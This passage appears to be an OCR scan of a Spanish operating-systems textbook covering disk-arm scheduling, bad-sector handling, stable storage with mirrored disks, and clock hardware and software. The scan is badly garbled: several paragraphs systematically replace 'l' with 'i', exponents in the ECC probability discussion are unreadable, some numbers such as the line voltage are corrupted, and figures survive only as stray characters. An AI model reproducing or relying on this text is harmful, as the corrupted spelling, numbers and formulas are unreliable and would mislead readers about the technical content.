vierte. Cuando el bit se establece en ABAJ O, el movimiento es a la siguiente posición de petición 
con menor prioridad, si la hay. 

En la figura 5-29 se muestra el algoritmo del elevador usando las mismas siete peticiones que 
en la figura 5-28, suponiendo que el bit de dirección haya sido ARRIBA en un principio. El orden en 
el que se da servicio a los cilindros es 12, 16, 34, 36, 9 y 1, que produce los movimientos del bra¬ 
zo de 1, 4, 18, 2, 27 y 8, para un total de 60 cilindros. En este caso, el algoritmo del elevador es li¬ 
geramente mejor que SSF, aunque por lo general es peor. Una buena propiedad que tiene el 
algoritmo del elevador es que dada cierta colección de peticiones, el límite superior en el movimien¬ 
to total es fijo: es sólo el doble del número de cilindros. 


Posición 

iniciai 


\ 



X 








X 


X 

X 




X 


















X 


X 





0 5 10 15 20 25 30 35 Ciiindro 


o 

Q. 



Una ligera modificación de este algoritmo que tiene una variación menor en tiempos de res¬ 
puesta (Teory, 1972) es explorar siempre en la misma dirección. Cuando el cilindro de mayor nu¬ 
meración con una petición pendiente ha sido atendido, el brazo pasa al cilindro de menor 
numeración con una petición pendiente y después continúa desplazándose en dirección hacia arri¬ 
ba. En efecto, se considera que el cilindro de menor numeración está justo por encima del cilindro 
de mayor numeración. 

Algunos controladores de disco proveen una forma para que el software inspeccione el núme¬ 
ro de sector actual bajo la cabeza. Con dicho controlador es posible otra optimización. Si hay dos 
o más peticiones para el mismo cilindro pendientes, el controlador puede emitir una petición para 
el sector que pasará bajo la cabeza a continuación. Observe que cuando hay varias pistas presentes 
en un cilindro, las peticiones consecutivas pueden ser para distintas pistas sin castigo. El controla¬ 
dor puede seleccionar cualquiera de sus cabezas casi en forma instantánea (la selección de cabezas 
no implica un movimiento del brazo ni un retraso rotacional). 
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Si el disco tiene la propiedad de que el tiempo de búsqueda es mucho más rápido que el retra¬ 
so rotacional, entonces se debe utilizar una optimización distinta. Las peticiones pendientes deben 
ordenarse por número de sector, y tan pronto como el siguiente sector esté a punto de pasar por de¬ 
bajo de la cabeza, el brazo debe moverse rápidamente a la pista correcta para leer o escribir. 

Con un disco duro moderno, los retrasos de búsqueda y rotacional dominan tanto el rendimien¬ 
to que es muy ineficiente leer uno o dos sectores a la vez. Por esta razón, muchos controladores de 
disco siempre leen y colocan en la caché varios sectores, aún y cuando sólo se solicite uno. Por lo 
general, cualquier solicitud para leer un sector hará que se lea ese sector y gran parte de (o toda) la 
pista actual, dependiendo de qué tanto espacio haya disponible en la memoria caché del controla¬ 
dor. El disco descrito en la figura 5-18 tiene una caché de 4 M B, por ejemplo. El uso de la caché se 
determina en forma dinámica mediante el controlador. En su modo más simple, la caché se divide 
en dos secciones, una para lecturas y una para escrituras. Si una lectura subsiguiente se puede sa¬ 
tisfacer de la caché del controlador, puede devolver los datos solicitados de inmediato. 

Vale la pena recalcar que la caché del controlador de disco es completamente independiente de 
la caché del sistema operativo. Por lo general, la caché del controlador contiene bloques que en rea¬ 
lidad no se han solicitado, pero que era conveniente leer debido a que pasaron por debajo de la ca¬ 
beza como efecto secundario de alguna otra lectura. Por el contrario, cualquier caché mantenida por 
el sistema operativo consistirá en bloques que se hayan leído de manera explícita y que el sistema 
operativo considere que podrían ser necesarios de nuevo en un futuro cercano (por ejemplo, un blo¬ 
que de disco que contiene un bloque de directorio). 

Cuando hay varias unidades presentes en el mismo controlador, el sistema operativo debe 
mantener una tabla de peticiones pendiente para cada unidad por separado. Cada vez que una uni¬ 
dad está inactiva, debe emitirse una búsqueda para desplazar su brazo al cilindro en donde se ne¬ 
cesitará a continuación (suponiendo que el controlador permita búsquedas traslapadas). Cuando 
termine la transferencia actual, se puede realizar una comprobación para ver si hay unidades posi- 
cionadas en el cilindro correcto. Si hay una o más, la siguiente transferencia se puede iniciar en 
una unidad que ya se encuentre en el cilindro correcto. Si ningún brazo está en la posición correc¬ 
ta, el software controlador deberá emitir una nueva búsqueda en la unidad que haya terminado una 
transferencia y deberá esperar hasta la siguiente interrupción para ver cuál brazo llega primero a 
su destino. 

Es importante tener en cuenta que todos los algoritmos de planificación de disco anteriores asu¬ 
men de manera tácita que la geometría de disco real es igual que la geometría virtual. Si no es así, 
entonces no tiene sentido planificar las peticiones de disco, ya que el sistema operativo en realidad 
no puede saber si el cilindro 40 o el cilindro 200 está más cerca del cilindro 39. Por otra parte, si el 
controlador de disco puede aceptar varias peticiones pendientes, puede utilizar estos algoritmos de 
planificación en forma interna. En ese caso, los algoritmos siguen siendo válidos, pero un nivel más 
abajo, dentro del controlador. 

5.4.4 M anejo de errores 

Los fabricantes de disco constantemente exceden los límites de la tecnología al incrementar las 
densidades de bits lineales. Una pista a la mitad de un disco de 5.25 pulgadas tiene una circunfe¬ 
rencia de 300 mm aproximadamente. Si la pista contiene 300 sectores de 512 bytes, la densidad 
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de grabación lineal puede ser de aproximadamente 5000 bits/mm, tomando en consideración el he¬ 
cho de que se pierde cierto espacio debido a los preámbulos, ECCs y huecos entre sectores. Para 
grabar 5000 bits/mm se requiere un sustrato en extremo uniforme y una capa de óxido muy fina. 
Por desgracia, no es posible fabricar un disco con tales especificaciones sin defectos. Tan pronto 
como la tecnología de fabricación haya mejorado hasta el grado en que sea posible operar sin erro¬ 
res a dichas densidades, los diseñadores de discos buscarán densidades más altas para incremen¬ 
tar la capacidad. AI hacer esto, probablemente vuelvan a introducir defectos. 

Los defectos de fabricación incluyen sectores defectuosos: es decir, sectores que no leen correc¬ 
tamente el valor que se acaba de escribir en ellos. Si el defecto es muy pequeño, por ejemplo, de unos 
cuantos bits, es posible utilizar el sector defectuoso y sólo dejar que el ECC corrija los errores cada 
vez. Si el defecto es mayor, el error no se puede enmascarar. 

Hay dos métodos generales para los bloques defectuosos: lidiar con ellos en el controlador o 
lidiar con ellos en el sistema operativo. En el primer método, antes de que el disco salga de la fá¬ 
brica, se prueba y se escribe una lista de sectores defectuosos en el disco. Cada sector defectuoso 
se sustituye por uno de los sectores adicionales. 

Hay desformas de realizar esta sustitución. En la figura 5-30(a) podemos ver una sola pista de 
disco con 30 sectores de datos y dos sectores adicionales. El sector 7 está defectuoso. Lo que el con¬ 
trolador puede hacer es reasignar uno de los sectores adicionales como el sector 7, como se mues¬ 
tra en la figura 5-30(b). La otra forma es desplazar todos los sectores una posición hacia arriba, 
como se muestra en la figura 5-30(c). En ambos casos, el controlador tiene que saber cuál sectores 
cuál. Puede llevar el registro de esta información medí ante tablas internas (una por pista), o volvien¬ 
do a escribir los preámbulos para proporcionar los números de los sectores reasignados. Si se vuel¬ 
ven a escribir los preámbulos, el método de la figura 5-30(c) presenta más dificultad (debido a que 
se tienen que volver a escribir 23 preámbulos) pero en última instancia ofrece un mejor rendimien¬ 
to, ya que de todas formas se puede leer una pista completa en una rotación. 





Figura 5-30. (a) U na pista de disco con un sector defectuoso, (b) Sustitución de un 
sector adicional por un sector defectuoso, (c) Desplazar todos los sectores para omitir 
el defectuoso. 


También se pueden desarrollar errores durante la operación normal, una vez que se haya insta¬ 
lado la unidad. La primera línea de defensa al obtener un error que el ECC no puede manejar es tra¬ 
tar de leerlo otra vez. Algunos errores de lectura son transitorios: es decir, son producidos por 
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partículas de polvo bajo la cabeza y desaparecerán en un segundo intento. Si ei controiador detec¬ 
ta que está obteniendo errores repetidos en cierto sector, puede cambiar a un sector de reempiazo 
antes de que ei sector defectuoso faiie para siempre. De esta manera no se pierden datos; ei sistema 
operativo y ei usuario ni siquiera se enteran dei probiema. Por io generai, se ti ene que utiiizar ei mé¬ 
todo de ia figura 5-30(b) debido a que ios otros sectores podrían contener ahora datos. Para utiiizar 
ei método de ia figura 5-30(c) no sóio habría que voiver a escribir ios preámbuios, sino también co¬ 
piar todos ios datos. 

Anteriormente dijimos que había dos métodos generaies para manejar errores: manejados en ei 
controiador o en ei sistema operativo. Si ei controiador no tiene ia capacidad de reasignar sectores 
de manera transparente como hemos visto, ei sistema operativo tiene que hacer io mismo en soft¬ 
ware. Esto significa que primero debe adquirir una iista de sectores defectuosos, ya sea ieyéndoios 
dei disco, o simpiemente probando todo ei disco en sí. Una vez que sepa cuáies sectores están de¬ 
fectuosos, puede construir tabias de reasignación. Si ei sistema operativo desea utiiizar ei método 
de ia figura 5-30(c), debe cambiar ios datos en ios sectores dei 7 ai 29, un sector hacia arriba. 

Si ei sistema operativo se está haciendo cargo de ia reasignación, debe asegurarse que no ha¬ 
ya sectores maios en ningún archivo, y que tampoco haya en ia iista iibreo mapa de bits. Una ma¬ 
nera de hacer esto es crear un archivo que consista de todos ios sectores maios. Si este archivo no 
se introduce en ei sistema de archivos, ios usuarios no io ieerán por accidente (o peor aún, io iibe- 
rarán). 

Sin embargo, hay otro probiema: ios respaidos. Si ei disco se respaida archivo por archivo, es 
importante que ia herramienta de respaido no trate de copiar ei archivo con ei bioque defectuoso. 
Para evitar esto, ei sistema operativo tiene que ocuitar ei archivo con ei bioque defectuoso tan bien 
que ni siquiera una herramienta de respaido pueda encontrario. Si ei disco se respaida sector por 
sector, en vez de archivo por archivo, será difícii (si no imposibie) evitar errores de iectura duran¬ 
te ei respaido. La única esperanza es que ei programa de respaido tenga suficiente inteiigencia pa¬ 
ra rendirse después de 10 iecturas faiiidas y continúe con ei siguiente sector. 

L os sectores defectuosos no son i a única fuente de errores. También ocurren errores de búsque¬ 
da producidos por probiemas mecánicos en ei brazo. Ei controiador i i eva ei registro de i a posición dei 
brazo de manera interna. Para reaiizar una búsqueda, emite una serie de puisos en ei motor dei bra¬ 
zo, un puiso por ciiindro, para despiazario ai nuevo ciiindro. Cuando ei brazo iiega a su destino, ei 
controiador iee ei número dei ciiindro actuai dei preámbuiodei siguiente sector. Si ei brazo está en 
ia posición incorrecta, ha ocurrido un error de búsqueda. 

La mayoría de ios controiadores de disco duro corrigen ios errores de búsqueda de manera au¬ 
tomática, pero ia mayoría de ios controiadores de disco fiexibie (inciuyendo ei dei Pentium) sóio 
estabiecen un bit de error y dejan ei resto ai controiador, que a su vez maneja este error emitiendo 
un comando recaiibrate, para aiejarei brazo io más que sea posibiey restabiecer ia idea interna dei 
controiador dei ciiindro actuai a 0. Por io generai, esto resueiveei probiema. Si no es así, ia unidad 
se debe reparar. 

Como hemos visto, ei controiador es en reaiidad una pequeña computadora especiaiizada, 
compieta con software, variabies, búferes y, en aigunas ocasiones, errores. Aigunas veces una se¬ 
cuencia inusuai de eventos, como una interrupción en una unidad que ocurre de manera simuitá- 
nea con un comando recaiibrate para otra unidad desencadenará un error y hará queei controiador 
entre en un cicio o que pierda ia cuenta de io que estaba haciendo. Los diseñadores de ios contro- 
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ladores por lo general planean para lo peor y proporcionan una terminal en el chip que, cuando se 
le aplica una señal, obliga al controlador a olvidar lo que estaba haciendo y se restablece a sí mis¬ 
mo. Si todo lo demás falla, el controlador de disco puede establecer un bit para invocar esta señal 
y restablecer el controlador. Si eso no ayuda, todo lo que puede hacer el software controlado es 
imprimir un mensaje y darse por vencido. 

Al recalibrar un disco éste hace un ruido extraño, pero que por lo general no es molesto. Sin 
embargo, hay una situación en la que la recalibración es un grave problema: los sistemas con res¬ 
tricciones de tiempo real. Cuando se está reproduciendo un video de un disco duro, o cuando se que¬ 
man archivos de un disco duro en un CD-ROM, es esencial que los bits salgan del disco duro a una 
velocidad uniforme. Bajo estas circunstancias, las recalibraciones insertan huecos en el flujo de bits 
y por lo tanto son inaceptables. Para tales aplicaciones hay disponibles unidades especiales, cono¬ 
cidas como discosAV (discos Audio Visuales), que nunca se tienen que recalibrar. 

5.4.5 Almacenamiento estable 

Como hemos visto, los discos algunas veces cometen errores. Los sectores buenos pueden de pron¬ 
to volverse defectuosos. Discos completos pueden dejar de funcionar inesperadamente. LosRAIDs 
protegen contra el hecho de que unos cuantos sectores se vuelvan defectuosos, o incluso que falle 
una unidad. Sin embargo, no protegen contra los errores de escritura que establecen datos defectuo¬ 
sos en primer lugar. Tampoco protegen contra las fallas durante las escrituras que corrompen los da¬ 
tos originales sin reemplazarlos con datos nuevos. 

Para algunas aplicaciones es esencial que los datos nunca se pierdan o corrompan, incluso fren¬ 
te a errores de disco o de CPU. En teoría, un disco simplemente debe trabajar todo el tiempo sin 
errores. Por desgracia, eso no se puede lograr. Lo que se puede lograr es un subsistema de disco que 
tenga la siguiente propiedad: cuando se emita una escritura, el disco debe escribir correctamente los 
datos o no hacer nada, dejando los datos existentes intactos. A dicho sistema se le conoce como al¬ 
macenamiento estable y se implemento en software (Lampson y Sturgis, 1979). El objetivo es 
mantener el disco consistente a toda costa. A continuación analizaremos una ligera variante de la 
idea original. 

Antes de describir el algoritmo, es importante tener un modelo claro délos posibles errores. El 
modelo asume que cuando un disco escribe un bloque (uno o más sectores), la escritura es correc¬ 
ta o incorrecta y este error se puede detectar en una lectura subsiguiente, al examinar los valores de 
los campos ECC. En principio, no es posible una detección de errores garantizada debido a que, por 
ejemplo, con un campo ECC de 16 bytes que protege a un sector de 512 bytes, hay 24“^® valores de 
datos y sólo 2^^^ valores de ECC. Por ende, si se daña la información de un bloque durante la 
escritura pero el ECC no, hay miles de millones sobre miles de millones de combinaciones inco¬ 
rrectas que producen el mismo ECC. Si ocurre cualquiera de ellas, el error no se detectará. En gene¬ 
ral, la probabilidad de que datos aleatorios tengan el ECC de 16 bytes apropiado es de casi 2“^^^, lo 
suficientemente pequeño como para poder llamarlo cero, aunque en realidad no lo es. 

El modelo también supone que un sector escrito correctamente puede volverse defectuoso 
de manera repentina, quedando ilegible. Sin embargo, la suposición es que dichos eventos son tan 
raros que la probabilidad de que el mismo sector se vuelva defectuoso en una segunda unidad 
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(independiente) durante un intervaio de tiempo razonabie (por ejempio, 1 día) es io bastante peque¬ 
ña como para ignorada. 

Ei modeio supone además que ia CPU puede faiiar, en cuyo caso sóio se detiene. Cuaiquier es¬ 
critura de disco en progreso durante ia faiia también se detiene, io cuai produce datos incorrectos 
en un sector y un ECC incorrecto que se puede detectar posteriormente. Bajo todas estas condicio¬ 
nes, ei aimacenamiento estabie puede ser 100% confiabie en ei sentido de que ias operaciones de 
escritura funcionen correctamente o de io contrario se dejarán ios datos antiguos en su iugar. Des¬ 
de iuego que no protege contra desastres físicos, como ia ocurrencia de un terremoto y que ia compu¬ 
tadora caiga por una fisura de 100 metros y aterrice en un charco de magma hirviente. Es difícii 
recuperarse de esta condición mediante software. 

Ei aimacenamiento estabie utiiiza un par de discos idénticos, en donde ios bioques correspon¬ 
dientes funcionan en conjunto para formar un bioque iibre de errores. En ia ausencia de errores, ios 
bioques correspondientes en ambas unidades son iguaies. Cuaiquiera se puede ieer para obtener ei 
mismo resuitado. Para iograr este objetivo, se definen ias siguientes tres operaciones: 

1. Escrituras estables. Una escritura estabie consiste en primero escribir ei bioque en ia uni¬ 
dad 1, y después voiver a ieerio para verificar que se haya escrito correctamente. Si no se 
escribió en forma correcta, ias operaciones de escribir y voiver a ieer se reaiizan de nuevo, 
hasta n veces hasta que funcione. Después de n faiios consecutivos, ei bioque se reasigna a 
un bioque adicionai y ia operación se repite hasta tener éxito, sin importar cuántos bioques 
adicionaies haya que probar. Una vez que tiene éxito ia escritura en ia unidad 1, se escribe 
ei bioque correspondiente en ia unidad 2 y se vueive a ieer, repetidas veces si es necesario, 
hasta que también tiene éxito esta operación. En ia ausencia defaiias de ia CPU, cuando se 
compieta una escritura estabie, ei bioque se ha escrito correctamente en ambas unidades y 
se ha verificado también en ambas. 

2. Lecturas estables. En una iectura estabie primero se iee ei bioque de ia unidad 1. Si esto 
produce un ECC incorrecto, ia operación de iectura se vueive a intentar hasta n veces. Si to¬ 
das estas operaciones producen ECCs defectuosos, se iee ei bioque correspondiente de ia 
unidad 2. Dado ei hecho de que una escritura estabie exitosa deja dos copias correctas dei 
bioque, y en base a nuestra suposición de que ia probabiiidad de que ei mismo bioque se 
vueiva defectuoso de manera repentina en ambas unidades en un intervaio de tiempo razo¬ 
nabie es insignificante, siempre se obtiene una iectura estabie. 

3. Recuperación de fallas. Después de una faiia, un programa de recuperación expiora ambos 
discos y compara ios bioques correspondientes. Si un par de bioques están bien y son igua¬ 
ies, no se hace nada. Si uno de eiios tiene un error de ECC, ei bioque defectuoso se sobres¬ 
cribe con ei bioque bueno correspondiente. Si un par de bioques están bien pero son 
distintos, ei bioque de ia unidad 1 se escribe en ia unidad 2. 

En ausencia de faiias de ia CPU, este esquema funciona debido a que ias escrituras estabies 
siempre escriben dos copias váiidas de cada bioque, y se asume que ios errores espontáneos nunca 
ocurrirán en ambos bioques correspondientes ai mismo tiempo. ¿Y qué tai en ia presencia de faiias 
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de la CPU durante escrituras estables? Depende del momento preciso en el que ocurra la falla. Hay 
cinco posibilidades, como se muestra en la figura 5.31. 
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Figura 5-31. Análisis de la influencia de fallas en escrituras estables. 


En la figura 5-31(a), la falla en la CPU ocurre antes de escribir cualquiera de las dos copias del 
bloque. Durante la recuperación no se cambiará ninguno de los dos bloques y el valor anterior se¬ 
guirá existiendo, lo cual está permitido. 

En la figura 5-31(b), la CPU falla durante la escritura en la unidad 1, destruyendo el contenido 
del bloque. Sin embargo, el programa de recuperación detecta este error y restaura el bloque en la 
unidad 1 con el bloque en la unidad 2. Por ende, el efecto de la falla se borra y el estado anterior se 
restaura por completo. 

En la figura 5-31(c), la falla de la CPU ocurre una vez que se escribe en la unidad 1, pero an¬ 
tes de escribir en la unidad 2. Aquí se ha traspasado el punto donde no hay retorno: el programa de 
recuperación copia el bloque de la unidad 1 a la unidad 2. La escritura tiene éxito. 

La figura 5-31(d) es como la figura 5-31(b): durante la recuperación, el bloque bueno sobres¬ 
cribe al bloque malo. De nuevo, el valor final de ambos bloques es el nuevo. 

Por último, en la figura 5-31(e) el programa de recuperación ve que ambos bloques son igua¬ 
les, por lo que no se cambia ninguno y la escritura tiene éxito también. 

Hay varias optimizaciones y mejoras posibles para este esquema. Para empezar, la acción de 
comparar todos los bloques en pares después de una falla es posible de hacer, pero costosa. Una 
enorme mejora es llevar la cuenta de cuál bloque se estaba escribiendo durante una escritura esta¬ 
ble, de manera que se tenga que comprobar sólo un bloque durante la recuperación. Algunas compu¬ 
tadoras tienen una pequeña cantidad de RAM no volátil, la cual es una memoria CMOS especial, 
energizada por una batería de litio. Dichas baterías duran años, posiblemente durante toda la vida 
de la computadora. A diferencia de la memoria principal, que se pierde después de una falla, no se 
pierde la RA M no volátil durante una falla. La hora del día se mantiene aquí por lo general (y se in¬ 
crementa mediante un circuito especial), lo cual explica por qué las computadoras siguen sabiendo 
qué hora es, aún después de que se hayan desconectado. 

Suponga que hay unos cuantos bytes de RAM no volátil disponibles para fines del sistema ope¬ 
rativo. La escritura estable puede colocar el número del bloque que está a punto de actualizar en la 
RAM no volátil antes de empezar la escritura. Una vez que se completa con éxito la escritura estable. 
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el número de bloque en la RAM no volátil se sobrescribe con un número de bloque inválido: por 
ejemplo, -1. Bajo estas condiciones, después de una falla el programa de recuperación puede ve¬ 
rificar la RAM no volátil para ver si había una escritura estable en progreso durante la falla, y de 
ser así, cuál bloque se estaba escribiendo cuando ocurrió la falla. Después se puede comprobar que las 
dos copias del bloque sean correctas y consistentes. 

Si la RAM no volátil no está disponible, se puede simular de la siguiente manera. Al inicio de 
una escritura estable, se sobrescribe un bloque de disco fijo en la unidad 1 con el número del blo¬ 
que en el que se va a realizar la escritura estable. Después este bloque se vuelve a leer para verifi¬ 
carlo. Después de obtener el bloque correcto, se escribe y verifica el bloque correspondiente en la 
unidad 2. Cuando la escritura estable se completa correctamente, ambos bloques se sobrescriben 
con un número de bloque inválido y se verifican. De nuevo, después de una falla es fácil determi¬ 
nar si había o no una escritura estable en progreso durante la falla. Desde luego que esta técnica re¬ 
quiere ocho operaciones de disco adicionales para escribir un bloque estable, por lo que debería 
utilizarse sólo en casos muy necesarios. 

Vale la pena mencionar un último punto. Hicimos la suposición de que sólo ocurre un cambio 
espontáneo de un bloque bueno a un bloque defectuoso por cada bloque a diario. Si pasan suficien¬ 
tes días, el otro también podría volverse defectuoso. Por lo tanto, una vez al día se debe realizar una 
exploración completa de ambos discos para reparar cualquier daño. De esta forma, cada mañana am¬ 
bos discos siempre son idénticos. Incluso si ambos bloques en un par se vuelven defectuosos dentro 
de un periodo de unos cuantos días, todos los errores se reparan en forma correcta. 

5.5 RELOJES 

Los relojes (también conocidos como temporizadores) son esenciales para la operación de cual¬ 
quier sistema de multiprogramación, por una variedad de razones. M antienen la hora del día y evi¬ 
tan que un proceso monopolícela CPU, entre otras cosas. El software de reloj puede tomar la forma 
de un software controlador de dispositivo, aun y cuando un reloj no es un dispositivo de bloque (co¬ 
mo un disco) ni un dispositivo de carácter (como un ratón). Nuestro análisis de los relojes seguirá 
el mismo patrón que en la sección anterior: primero un vistazo al hardware del reloj y después un 
vistazo a su software. 

5.5.1 H ardware de reloj 

Hay dos tipos de relojes de uso común en las computadoras, y ambos son bastante distintos de los 
relojes que utilizan las personas. Los relojes más simples están enlazados a la línea de energía de 
lio o 220 voltios y producen una interrupción en cada ciclo de voltaje, a 50 o 60 Hz. Estos relojes 
solían dominar el mercado, pero ahora son raros. 

El otro tipo de reloj se construye a partir de tres componentes: un oscilador de cristal, un con¬ 
tador y un registro contenedor, como se muestra en la figura 5-32. Cuando una pieza de cristal de 
cuarzo se corta en forma apropiada y se monta bajo tensión, puede generar una señal periódica con 
una precisión muy grande, por lo general en el rango de varios cientos de megahertz, dependiendo 
del cristal elegido. M ediante el uso de componentes electrónicos, esta señal base puede multiplicar- 
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se por un pequeño entero para obtener frecuencias de hasta 1000 M Hz o incluso más. Por lo menos 
uno de esos circuitos se encuentra comúnmente en cualquier computadora, el cual proporciona una 
señal de sincronización para los diversos circuitos de la misma. Esta señal se alimenta al contador 
para hacer que cuente en forma descendente hasta cero. Cuando el contador llega a cero, produce 
una interrupción de la CPU. 


Oscilador de cristal 



El contador se decrementa con cada pulso 


EI registro contenedor se utiliza para cargar el contador 


Por lo general, los relojes programadles tienen varios modos de operación. En el modo de un 
solo disparo, cuando se inicia el reloj copia el valor del registro contenedor en el contador y des¬ 
pués decrementa el contador en cada pulso del cristal. Cuando el contador llega a cero, produce una 
interrupción y se detiene hasta que vuelve a ser iniciado en forma explícita mediante el software. 
En el modo de onda cuadrada, después de llegar a cero y producir la interrupción, el registro con¬ 
tenedor se copia automáticamente en el contador y todo el proceso se repite de nuevo en forma in¬ 
definida. Estas interrupciones periódicas se conocen como pulsos de reloj. 

La ventaja del reloj programable es que su frecuencia de interrupción se puede controlar me¬ 
diante software. Si se utiliza un cristal de 500 M Hz, entonces se aplica un pulso al contador ca¬ 
da 2 nseg. Con registros de 32 bits (sin signo), se pueden programar interrupciones para que 
ocurran a intervalos de 2 nseg hasta 8.6 seg. Los chips de reloj programadles por lo general con¬ 
tienen dos o tres relojes que pueden programarse de manera independiente, y tienen muchas otras 
opciones también (por ejemplo, contar en forma ascendente o descendente, deshabilitar interrup¬ 
ciones, y más). 

Para evitar que se pierda la hora actual cuando se apaga la computadora, la mayoría cuentan 
con un reloj de respaldo energizado por batería, implementado con el tipo de circuitos de baja 
energía que se utilizan en los relojes digitales. El reloj de batería puede leerse al iniciar el sistema. 
Si no está presente, el software puede pedir al usuario la fecha y hora actuales. También hay una 
forma estándar para que un sistema obtenga la hora actual de un host remoto. En cualquier caso, 
la hora se traduce en el número de pulsos de reloj desde las 12 a.m. UTC (U niversal Coordinated 
Time, Tiempo coordenado universal) (anteriormente conocido como Tiempo del meridiano de 
Greenwich) el 1 de enero de 1970, como lo hace UNIX, o a partir de algún otro momento de re¬ 
ferencia. El origen del tiempo para Windows es enero 1, 1980. En cada pulso de reloj, el tiempo 
real se incrementa por un conteo. Por lo general se proporcionan programas utilitarios para 
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establecer el reloj del sistema y el reloj de respaldo en forma manual, y para sincronizar los dos 
relojes. 

5.5.2 Software de reloj 

Todo lo que hace el hardware del reloj es generar interrupciones a intervalos conocidos. Todo lo de¬ 
más que se relacione con el tiempo debe ser realizado por el software controlador del reloj. Las ta¬ 
reas exactas del controlador del reloj varían de un sistema operativo a otro, pero por lo general 
incluyen la mayoría de las siguientes tareas: 

1. M antener la hora del día. 

2. Evitar que los procesos se ejecuten por más tiempo del que tienen permitido. 

3. Contabilizar el uso de la CPU. 

4. M anejar la llamada al sistema aiarm que realizan los procesos de usuario. 

5. Proveer temporizadores guardianes (watchdogs) para ciertas partes del mismo sistema. 

6. Realizar perfil amiento, supervisión y recopilación de estadísticas. 

La primera función del reloj, mantener la hora del día (también conocida como tiempo real), 
no es difícil. Sólo requiere incrementar un contador en cada pulso de reloj, como se dijo antes. Lo 
único por lo que debemos estar al pendiente es el número de bits en el contador de la hora del día. 
Con una velocidad de reloj de 60 Hz, un contador de 32 bits se desbordará aproximadamente en 2 
años. Es evidente que el sistema no puede almacenar el tiempo real como el número de pulsos del 
reloj desde enero 1, 1970 en 32 bits. 

Se pueden usar tres métodos para resolver este problema. El primero es utilizar un contador de 
64 bits, aunque para ello se vuelve más complejo dar mantenimiento al contador, ya que se tiene 
que realizar muchas veces por segundo. El segundo es mantener la hora del día en segundos, en vez 
de pulsos, usando un contador subsidiario para contar pulsos hasta que se haya acumulado un se¬ 
gundo completo. Como 2^^ segundos equivale a más de 136 años, este método funcionará hasta el 
siglo XXII. 

El tercer método es contaren pulsos, pero hacerlo de manera relativa a la hora en que se inició 
el sistema, en vez de un momento externo fijo. Cuando el reloj de respaldo se lee o el usuario es¬ 
cribe la hora real, el tiempo de inicio del sistema se calcula a partir del valor de la hora del día ac¬ 
tual y se almacena en memoria, en cualquier forma conveniente. M ás adelante, cuando se solicita 
la hora del día, se suma al contador la hora almacenada del día para obtener la hora actual. Los tres 
métodos se muestran en la figura 5-33. 

La segunda función del reloj es evitar que los procesos se ejecuten en demasiado tiempo. Ca¬ 
da vez que se inicia un proceso, el planificador inicializa un contador para el valor del quantum de 
ese proceso, en pulsos de reloj. En cada interrupción del reloj, el software controlador del mismo 
decrementa el contador del quantum en 1. Cuando llega a cero, el software control ador del reloj lla¬ 
ma al planificador para establecer otro proceso. 
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Tiempo de Inicio del 
sistema en segundos 
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Figura 5-33. Tres formas de mantener la hora del día. 


La tercera función del reloj es contabilizar el uso de la CPU. La forma más precisa de hacerlo 
es iniciar un segundo temporizador, distinto del temporizador principal del sistema, cada vez que se 
inicia un proceso. Cuando ese proceso se detiene, el temporizador se puede leer para saber cuánto 
tiempo se ha ejecutado el proceso. Para hacer lo correcto, el segundo temporizador se debe guardar 
cuando ocurre una interrupción y se debe restaurar cuando ésta termine. 

Una manera menos precisa pero más simple de realizar la contabilidad es mantener en una va¬ 
riable global un apuntador a la entrada en la tabla de procesos para el proceso actual en ejecución. 
En cada pulso de reloj se incrementa un campo en la entrada del proceso actual. De esta forma, ca¬ 
da pulso de reloj se "carga" al proceso en ejecución al momento del pulso. U n problema menor con 
esta estrategia es que, si ocurren muchas interrupciones durante la ejecución de un proceso, de to¬ 
das formas se le carga un pulso completo, aun cuando no haya podido realizar mucho trabajo. La 
contabilidad apropiada para la CPU durante las interrupciones es demasiado complicada y se reali¬ 
za en raras ocasiones. 

En muchos sistemas, un proceso puede sol icitar que el sistema operativo le proporcione una ad¬ 
vertencia después de cierto intervalo. La advertencia es por lo general una señal, interrupción, men¬ 
saje o algo similar. Una aplicación que requiere dichas advertencias es el trabajo en red, donde un 
paquete que no se reconozca durante cierto intervalo de tiempo se debe volver a transmitir. Otra 
aplicación es la instrucción asistida por computadora, donde un estudiante que no provee una res¬ 
puesta dentro de cierto tiempo la recibe automáticamente. 

Si el software controlador de reloj tuviera suficientes relojes, podría establecer un reloj sepa¬ 
rado para cada petición. Como éste no es el caso, debe simular varios relojes virtuales con un so¬ 
lo reloj físico. U na forma de hacer esto es mantener una tabla en la que se mantenga el tiempo de 
la señal de todos los temporizadores pendientes, así como una variable que proporcione el tiempo 
de la señal del siguiente. Cada vez que se actualiza la hora del día, el controlador comprueba que 
haya ocurrido la señal más cercana. Si así fue, se busca en la tabla la siguiente entrada que está 
por ocurrir. 

Si se esperan muchas señales, es más eficiente simular varios relojes al encadenar todas las pe¬ 
ticiones de reloj pendientes, ordenadas con base en el tiempo, en una lista enlazada como se mues¬ 
tra en la figura 5.34. Cada entrada en la lista indica cuántos pulsos de reloj después del anterior hay 
que esperar para poder producir una señal. En este ejemplo, hay señales pendientes para 4203, 4207, 
4213, 4215 y 4216. 
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Hora actual 


Encabezado 


4200 

de reloj 



Siguiente señal 


lEl—EO—011—011— 


Figura 5-34. Simulación de varios temporizadores con un solo reloj. 


En la figura 5-34, la siguiente interrupción ocurre en 3 pulsos. En cada pulso sedecrementa Si¬ 
guiente señal. Cuando llega a 0 se produce la señal correspondiente al primer elemento en la lista, 
y ese elemento se elimina de la misma. Después Siguiente señal se establece al valor en la entrada 
que se encuentra ahora en la cabeza de la lista, que en este ejemplo es 4. 

Observe que durante una interrupción de reloj, el software controlador del mismo tiene varias 
cosas por hacer: incrementar el tiempo real, decrementar el quantum y comprobar que sea 0, reali¬ 
zar la contabilidad del tiempo de la CPU y decrementar el contador de la alarma. Sin embargo, ca¬ 
da una de estas operaciones se han diseñado con cuidado para que sean muy rápidas, debido a que 
tienen que repetirse muchas veces por segundo. 

Hay partes del sistema operativo que también necesitan establecer temporizadores. A éstos se 
les conoce como temporizadores guardianes (watchdogs). Por ejemplo, los discos flexibles no gi¬ 
ran cuando no están en uso, para evitar desgaste en el medio y la cabeza del disco. Cuando se ne¬ 
cesitan datos de un disco flexible, primero se debe iniciar el motor. Sólo cuando el disco flexible 
está girando a toda velocidad se puede iniciar la operación de E/S. Cuando un proceso intenta leer 
de un disco flexible inactivo, el software controlador del mismo inicia el motor y después estable¬ 
ce un temporizador guardián para que produzca una interrupción cuando haya pasado un intervalo 
de tiempo suficientemente extenso (debido a que no hay un interruptor de máxima velocidad en el 
disco flexible). 

